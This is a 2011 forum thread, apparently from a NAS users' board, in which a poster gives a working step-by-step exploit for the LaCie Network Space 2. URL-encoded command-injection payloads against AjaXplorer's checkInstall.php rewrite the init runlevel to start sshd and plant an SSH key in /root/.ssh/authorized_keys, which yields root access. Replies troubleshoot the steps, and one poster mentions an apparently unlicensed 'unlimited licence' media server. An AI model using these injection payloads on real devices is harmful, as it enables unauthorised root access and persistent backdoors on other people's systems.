Getting Root for NS2 using a vulnerability web interface.

ak97
Posts: 28
Joined: Thu Feb 03, 2011 6:52 am
Location: Moscow

Getting Root for NS2 using a vulnerability web interface.

Post by ak97 » Thu Feb 03, 2011 5:31 pm

Getting Root for NS2 without a firmware update using the vulnerability web interface.
To start the standard warning: whatever you do - you do at your own risk.
This instruction is suitable for all firmware that use AjaXplorer 2.x (1.2.6-1.2.9 inclusive).
This statement is only checked on firmware 1.2.9! For other firmware perhaps will have some change query strings.

So, to get Root access, we need a web browser and a previously prepared text file with URL links through which we will make a hack.

Copy the following lines in the code section to a text file, in this case, replace the string YOUR.NS2.IP.ADDRESS the IP address of your NS2. Copy and change the line carefully, otherwise the result is not predictable.

STAGE1
To get started, register a service sshd's running at startup. To do this in the browser 6 queries.

1) make backup default.runlevel:

Code: Select all

http://YOUR.NS2.IP.ADDRESS/browser/plugins/access.ssh/checkInstall.php?destServer=2%3E/dev/null||cp%20/etc/initng/runlevel/default.runlevel%20/www/browser/plugins/access.ssh/default.runlevel.txt&&echo%20%22--Host%22
2) copy first 19 strings of default.runlevel

Code: Select all

http://YOUR.NS2.IP.ADDRESS/browser/plugins/access.ssh/checkInstall.php?destServer=2%3E/dev/null||head%20-19%20/etc/initng/runlevel/default.runlevel%3Edefault.runlevel&&echo%20%22--Host%22
3) put sshd string

Code: Select all

http://YOUR.NS2.IP.ADDRESS/browser/plugins/access.ssh/checkInstall.php?destServer=2%3E/dev/null||echo%20-en%20sshd%5Cn%3E%3Edefault.runlevel&&echo%20%22--Host%22
4) finish copy lines default.runlevel

Code: Select all

http://YOUR.NS2.IP.ADDRESS/browser/plugins/access.ssh/checkInstall.php?destServer=2%3E/dev/null||tail%20-3%20/etc/initng/runlevel/default.runlevel%3E%3Edefault.runlevel&&echo%20%22--Host%22
5) set +x flags

Code: Select all

http://YOUR.NS2.IP.ADDRESS/browser/plugins/access.ssh/checkInstall.php?destServer=2%3E/dev/null||chmod+%2bx+default.runlevel%3Etest.txt&&echo%20%22--Host%22
6) copy default.runlevel file to /etc/initng/runlevel

Code: Select all

http://YOUR.NS2.IP.ADDRESS/browser/plugins/access.ssh/checkInstall.php?destServer=2%3E/dev/null||cp%20/www/browser/plugins/access.ssh/default.runlevel%20/etc/initng/runlevel/default.runlevel&&echo%20%22--Host%22
Make sure that everything OK. Fulfill a request ...
... and see the result:

Code: Select all

http://YOUR.NS2.IP.ADDRESS/browser/plugins/access.ssh/test.txt
The result should look like this:

Code: Select all

initial                                                                                                                 
dbus                                                                                                                    
udev                                                                                                                    
hald                                                                                                                    
clock                                                                                                                   
dhcdbd                                                                                                                  
logrotate                                                                                                               
syslogd                                                                                                                 
klogd                                                                                                                   
swap                                                                                                                    
modules                                                                                                                 
mountfs                                                                                                                 
mountuserfs                                                                                                             
raid                                                                                                                    
usb                                                                                                                     
hostname                                                                                                                
NetworkManager                                                                                                          
http                                                                                                                    
getty/1                                                                                                                 
sshd                                                                                                                    
cron                                                                                                                    
unicorn                                                                                                                 
thumbd
If you do not have such a result - again all over again.

STAGE2
Now we have to prepare the RSA public key. To do this in a terminal run the following command:

Code: Select all

ssh-keygen -b 1024 -t rsa -N YOUR_PASSWORD -f lacie_ns2 
as a result you will have 2 files:
lacie_ns2
lacie_ns2.pub

open in your browser site http://www.string-functions.com/urlencode.aspx
Enter the contents of file lacie_ns2.pub in the upper window, and then click "Encode!".
in the lower window appears encoded rsa pub key content that will be necessary in these queries

STAGE3
Install public key on the device

1) Create a folder for key

Code: Select all

http://YOUR.NS2.IP.ADDRESS/browser/plugins/access.ssh/checkInstall.php?destServer=2%3E/dev/null||mkdir%20-p%20/root/.ssh%3Etest.txt&&echo%20%22--Host%22
2) Install public key

Code: Select all

http://YOUR.NS2.IP.ADDRESS/browser/plugins/access.ssh/checkInstall.php?destServer=2%3E/dev/null||echo%20<INSERT ENCODED RSA PUB KEY HERE>%3E/root/.ssh/authorized_keys&&echo%20%22--Host%22
Warning!
This is an example - it is not necessary to perform!
Your query should look like:

Code: Select all

http://192.168.1.100/browser/plugins/access.ssh/checkInstall.php?destServer=2%3E/dev/null||echo%20ssh-rsa+AABAB3NzaC1yc2EAAKABIwALAIEAtBDWi3rcLUXO5Fe%2b825Yp7TkL2UC98fYFtLjPKOgX7QDKL1pLrae%2fuzcSucmYtasZppxQaMU4mfdCI0ruC77ABvFZrB6upnkFs0xGJUr%2bsJY%2fU7LFvIb%2fbypcqMWTkBKhOhlrm1bvss%2fJ37%2b559Psa%2bMqvb%2bCPbbieFWzFPkgD8%3d+ak97%40MBP.local%3E/root/.ssh/authorized_keys&&echo%20%22--Host%22
[/color]

Done.
Restart the device. If everything was done correctly - you can connect to the device via ssh:
ssh -i ./lacie_ns2 root@YOUR.NS2.IP.ADDRESS
and change root password for allow connect from another machine.


P.S.
possible, this method can be simplified, but I'm too lazy to do it - and so works))...
P.P.S.
sorry for my english
Last edited by ak97 on Wed Mar 02, 2011 6:49 pm, edited 1 time in total.

ak97
Posts: 28
Joined: Thu Feb 03, 2011 6:52 am
Location: Moscow

Re: Creating a custom capsule / Hacking 1.2.6-1.2.9 NS2

Post by ak97 » Thu Feb 03, 2011 6:27 pm

Well done. After getting root access, i installed twonkeymedia server 6.0.30 with unlimited licence. it's easy. may be its post to another topic?

and one: i looking for best torrent-client with upload feature for installing to NS2

m1lkman
Posts: 11
Joined: Tue Jan 25, 2011 4:24 pm

Re: Creating a custom capsule / Hacking 1.2.6-1.2.9 NS2

Post by m1lkman » Thu Feb 03, 2011 8:59 pm

@ak97 Wow; I'm in!!!

Could you give me a quick pointer how to install twonky?

Regards,

Henk

ak97
Posts: 28
Joined: Thu Feb 03, 2011 6:52 am
Location: Moscow

Re: Creating a custom capsule / Hacking 1.2.6-1.2.9 NS2

Post by ak97 » Thu Feb 03, 2011 10:01 pm

Using the vulnerability web interface - is a hack. Pay no attention to the message browser. You just need to execute all commands sequentially.
m1lkman wrote: Could you give me a quick pointer how to install twonky?
sure, but later...

m1lkman
Posts: 11
Joined: Tue Jan 25, 2011 4:24 pm

Re: Creating a custom capsule / Hacking 1.2.6-1.2.9 NS2

Post by m1lkman » Fri Feb 04, 2011 8:18 am

ak97 wrote:sure, but later...
Thx, appreciated!

jhiswin
Posts: 44
Joined: Mon Oct 18, 2010 4:16 am

Re: Getting Root for NC2 using a vulnerability web interface

Post by jhiswin » Fri Feb 04, 2011 11:02 am

Nice. Just an FYI, the Lacie techs read this forum (or did in the past) and patched the old exploit. This will likely be patched in a next update, if they make one.

User avatar
cyberdog
Posts: 47
Joined: Tue Aug 24, 2010 9:20 am
Location: NANCY - FRANCE

Re: Getting Root for NC2 using a vulnerability web interface

Post by cyberdog » Fri Feb 04, 2011 11:29 am

Very big thank for ak97 :D

But I always stuck on stage 3, I'm good handling but my terminal asks for a password?

ak97
Posts: 28
Joined: Thu Feb 03, 2011 6:52 am
Location: Moscow

Re: Getting Root for NC2 using a vulnerability web interface

Post by ak97 » Fri Feb 04, 2011 2:13 pm

jhiswin wrote:Nice. Just an FYI, the Lacie techs read this forum (or did in the past) and patched the old exploit. This will likely be patched in a next update, if they make one.
Ok. Let patched - I do not mind)))
I advise everyone - once you get Root - delete or rename a file www/browser/plugins/access.ssh/checkInstall.php

ak97
Posts: 28
Joined: Thu Feb 03, 2011 6:52 am
Location: Moscow

Re: Getting Root for NC2 using a vulnerability web interface

Post by ak97 » Fri Feb 04, 2011 2:15 pm

@cyberdog - lets read tech info about ssh (ssh-keygen, ssh, pairing keys, etc.) then you will understand the meaning of the above procedures

User avatar
cyberdog
Posts: 47
Joined: Tue Aug 24, 2010 9:20 am
Location: NANCY - FRANCE

Re: Getting Root for NC2 using a vulnerability web interface

Post by cyberdog » Fri Feb 04, 2011 4:28 pm

ak97 wrote:@cyberdog - lets read tech info about ssh (ssh-keygen, ssh, pairing keys, etc.) then you will understand the meaning of the above procedures

Yes it's true

i don't understand this

m1lkman
Posts: 11
Joined: Tue Jan 25, 2011 4:24 pm

Re: Getting Root for NC2 using a vulnerability web interface

Post by m1lkman » Fri Feb 04, 2011 9:01 pm

cyberdog wrote:Very big thank for ak97 :D

But I always stuck on stage 3, I'm good handling but my terminal asks for a password?
@cyberdog: I had exactly the same issue yesterday ;)

Until I realised that in Stage 2 you actually set your ssh password. If you go back and read Stage 2, you see YOUR_PASSWORD.

Well, that's the password you have to provide when the terminal asks you to...

Good luck!

User avatar
cyberdog
Posts: 47
Joined: Tue Aug 24, 2010 9:20 am
Location: NANCY - FRANCE

Re: Getting Root for NC2 using a vulnerability web interface

Post by cyberdog » Sat Feb 05, 2011 9:57 am

m1lkman wrote:
cyberdog wrote:Very big thank for ak97 :D

But I always stuck on stage 3, I'm good handling but my terminal asks for a password?
@cyberdog: I had exactly the same issue yesterday ;)

Until I realised that in Stage 2 you actually set your ssh password. If you go back and read Stage 2, you see YOUR_PASSWORD.

Well, that's the password you have to provide when the terminal asks you to...

Good luck!
Yes, I now that
but don't work

I'm go back to 1.02 hard reset this evening
et try again.

vUksi
Posts: 1
Joined: Sat Feb 05, 2011 12:44 pm

Re: Getting Root for NC2 using a vulnerability web interface

Post by vUksi » Sat Feb 05, 2011 12:47 pm

Hi! Long time follower, first time poster blahblahblah.

Thanks a million ak97! I got everything working with your instructions. For some reason my first try left # in front of sshd but when I rebooted and tried again it worked.

minosh
Posts: 19
Joined: Sat Feb 05, 2011 8:46 pm

Re: Getting Root for NC2 using a vulnerability web interface

Post by minosh » Sat Feb 05, 2011 8:54 pm

Thank you so much ... that's so helpful.

I am also stuck in stage 3 , It does not accept the password, and i recreated a new certificate to be sure of the password and still the same ..

NB. spent too much time before i realize that multimedia server has to be enabled .. stupid me..

One question, is it possible to make other users folders accessible by the admin account ?? would it be possible to do that if i enable the SSH access ?

Thanks again

User avatar
cyberdog
Posts: 47
Joined: Tue Aug 24, 2010 9:20 am
Location: NANCY - FRANCE

Re: Getting Root for NC2 using a vulnerability web interface

Post by cyberdog » Sun Feb 06, 2011 4:19 pm

very good news for me

It work !!!

a big info

everything comes from my first test version 1.02 and 1.2.5
I had missed tests. then updated to version 1.2.9 and nothing worked!
I returned to factory settings, 1.02 and then updated in 1.2.9, try again and everything is correct.

Post Reply